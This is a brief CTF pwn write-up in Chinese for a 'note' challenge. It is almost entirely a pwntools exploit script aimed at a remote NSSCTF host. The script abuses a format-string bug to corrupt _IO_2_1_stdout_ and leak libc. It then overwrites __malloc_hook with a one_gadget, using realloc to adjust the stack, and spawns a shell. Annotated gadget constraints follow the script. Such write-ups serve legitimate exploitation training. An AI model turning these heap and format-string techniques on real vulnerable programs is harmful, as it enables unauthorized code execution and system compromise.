格式化字符串任意写,打_IO_2_1_stdout泄露libc
然后再次利用格式化字符串打realloc调栈的one_gadget
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("node4.anna.nssctf.cn",28168)
# io=process("./note")
elf=ELF("./note")
libc=ELF("./libc-2.23.so")
def add(s,cc):
io.sendlineafter(b"choice: ",b"1")
io.sendlineafter(b"size: ",str(s))
io.sendafter(b"content: ",cc)
def fmt(t,cc):
io.sendlineafter(b"choice: ",b"2")
io.sendafter(b"say ? ",t)
io.sendlineafter(b"? ",cc)
def show():
io.sendlineafter(b"choice: ",b"3")
# gdb.attach(io)
# pause()
payload=p64(0xfbad1887)+p64(0)*3
fmt(b"%7$saaaa",payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))+0x1430-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
free_hook=leak_addr+libc.sym[b"__free_hook"]
realloc=leak_addr+libc.sym[b"__libc_realloc"]
one_gadget=[0x45226, 0x4527a, 0xf03a4, 0xf1247]
shell=leak_addr+one_gadget[1]
# add(0x90,b"aaa")
# fmt %7$s
payload=p64(shell)+p64(realloc+0xc)
fmt(b"%7$saaaa"+p64(malloc_hook-0x8),payload)
# add(0x18,b"1")
io.sendlineafter(b"choice: ",b"1")
io.sendlineafter(b"size: ",b"1")
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL